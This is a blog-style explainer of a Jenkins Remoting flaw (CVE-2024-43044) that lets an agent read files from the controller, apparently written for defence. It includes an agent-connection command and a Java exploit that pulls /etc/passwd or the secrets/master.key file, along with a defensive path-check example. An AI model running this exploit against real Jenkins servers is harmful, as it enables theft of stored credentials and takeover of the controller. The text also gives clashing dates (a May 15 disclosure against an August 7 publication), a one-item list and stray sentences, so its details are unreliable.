CVE-2024-43044 - Critical Jenkins Remoting Vulnerability Allows Agent File Read – How It Works and Exploit Details

On May 15, 2024, the Jenkins team disclosed a severe vulnerability tracked as CVE-2024-43044. This flaw affects Jenkins 2.470 and earlier, and LTS 2.452.3 and earlier, enabling malicious Jenkins agents to read any file from the Jenkins controller file system. The root cause? Misuse of the ClassLoaderProxy#fetchJar method in the Remoting library. In this deep dive, we'll break down what happened, explain the exploit with code snippets, and link to key references.

What Is Jenkins Remoting?

Jenkins Remoting is the communication library used for the controller-agent architecture. Jenkins agents, whether running on build nodes, cloud VMs, or physical hardware, rely on "Remoting" to talk to the Jenkins controller.

What’s Vulnerable in Jenkins?

In Jenkins 2.470 and earlier (and their corresponding LTS branches), there’s a design bug in the way the controller and its agents communicate. The method ClassLoaderProxy#fetchJar allows an agent to request the content of any file on the controller, simply by specifying a relative path. There’s NO sandboxing or path validation!
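To make "no path validation" concrete, here is an added example (not from the original article, and not Jenkins' actual fix) of the kind of containment check a file-serving endpoint applies before reading a requested path. The class name `JarFetchGuard`, the `allowedRoot` directory and the sample requests are assumptions made for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

public class JarFetchGuard {
    // Hypothetical directory the controller is willing to serve JARs from.
    private final Path allowedRoot;

    public JarFetchGuard(Path allowedRoot) {
        this.allowedRoot = allowedRoot.toAbsolutePath().normalize();
    }

    /** Returns the validated path, or throws if the request escapes allowedRoot. */
    public Path resolveRequested(String requested) throws IOException {
        // resolve() returns 'requested' itself when it is absolute, so a request
        // like "/etc/passwd" is rejected by the same startsWith check as "../".
        Path candidate = allowedRoot.resolve(requested).normalize();
        if (!candidate.startsWith(allowedRoot)) {
            throw new SecurityException("outside allowed root: " + requested);
        }
        Path name = candidate.getFileName();
        if (name == null || !name.toString().endsWith(".jar")) {
            throw new SecurityException("not a JAR: " + requested);
        }
        // If the file exists, follow symlinks and re-check containment.
        if (Files.exists(candidate)) {
            Path real = candidate.toRealPath();
            if (!real.startsWith(allowedRoot.toRealPath())) {
                throw new SecurityException("symlink escapes allowed root: " + requested);
            }
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("jar-root"); // constructed sample root
        Files.createFile(root.resolve("remoting.jar"));
        JarFetchGuard guard = new JarFetchGuard(root);
        // Constructed requests: one legitimate, two using the paths named in this article.
        for (String req : new String[] {"remoting.jar", "/etc/passwd", "../../secrets/master.key"}) {
            try {
                System.out.println("ALLOW " + guard.resolveRequested(req));
            } catch (SecurityException e) {
                System.out.println("DENY  " + e.getMessage());
            }
        }
    }
}
```

Only the first request is allowed; the absolute path and the `../` traversal are both denied before any file is opened.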

Exploiting CVE-2024-43044: Step by Step

Let’s walk through the exploit theoretically (for educational and defensive purposes only).

1. Connect an agent

Suppose you're running your own agent (legit or compromised) and connect it to the Jenkins controller. You can use the standard Jenkins agent JAR for this:

java -jar agent.jar -jnlpUrl http://jenkins-controller/computer/agent-node/slave-agent.jnlp -secret <secret>

2. Send a custom Remoting request

Write a Java program that abuses the ClassLoaderProxy#fetchJar method. Here’s a simplified illustration:

import hudson.remoting.Channel;
import hudson.remoting.ClassLoaderProxy;

import java.io.FileOutputStream;
import java.io.InputStream;

public class JenkinsAgentExploit {
    public static void main(String[] args) throws Exception {
        // Assume 'channel' is connected to the controller
        Channel channel = // obtain from agent context

        // ClassLoaderProxy fetches JAR (actually ANY file)
        ClassLoaderProxy proxy = new ClassLoaderProxy(channel, JenkinsAgentExploit.class.getClassLoader(), "my-agent");

        // Attempt to fetch /etc/passwd (or Jenkins secrets)
        String targetFile = "/etc/passwd"; // Or "../../secrets/master.key"
        InputStream in = proxy.fetchJar(targetFile);

        // Save output
        FileOutputStream out = new FileOutputStream("output.txt");
        byte[] buffer = new byte[4096];
        int len;
        while ((len = in.read(buffer)) > 0) {
            out.write(buffer, 0, len);
        }
        in.close();
        out.close();

        System.out.println("File fetched from Jenkins controller!");
    }
}

Note: The above code won’t compile/run without the correct Remoting context, but demonstrates the core idea: fetch any file from the controller using Remoting calls.

3. What Can an Attacker Steal?

- secrets/*.key – Unlock all encrypted credentials in Jenkins.

Real-World Impact

If you run Jenkins with any (semi-)trusted agents, a malicious or compromised agent can instantly escalate into *full controller compromise*. All builds, secrets, and credentials are at risk. Even isolated build nodes aren’t safe.

Restrict the filesystem permissions of the Jenkins controller as much as possible.

Official Jenkins Security Advisory:
- https://www.jenkins.io/security/advisory/2024-05-15/#SECURITY-3373

Original CVE:
- https://nvd.nist.gov/vuln/detail/CVE-2024-43044

Summary Table

| Description | Details |
|--------------------------------------|-------------------------------------|
| CVE | CVE-2024-43044 |
| Affected | Jenkins 2.470 and earlier / LTS 2.452.3 and earlier |
| Component | Remoting / ClassLoaderProxy#fetchJar |
| Exploitability | Malicious or compromised agent |
| Impact | Read arbitrary files |
| Patch | 2.471 / LTS 2.452.4 |

Final Thoughts

CVE-2024-43044 is one of the most critical Jenkins vulnerabilities in recent years. If agents are not 100% trusted, or if you haven’t patched, you *may already be compromised*. Never allow untrusted nodes to connect to your Jenkins controller, and always update to the latest LTS or weekly release.

Stay safe, and patch now!

*For more info, always check the Jenkins Security Advisories.*

Timeline

Published on: 08/07/2024 14:15:33 UTC
Last modified on: 08/16/2024 17:19:30 UTC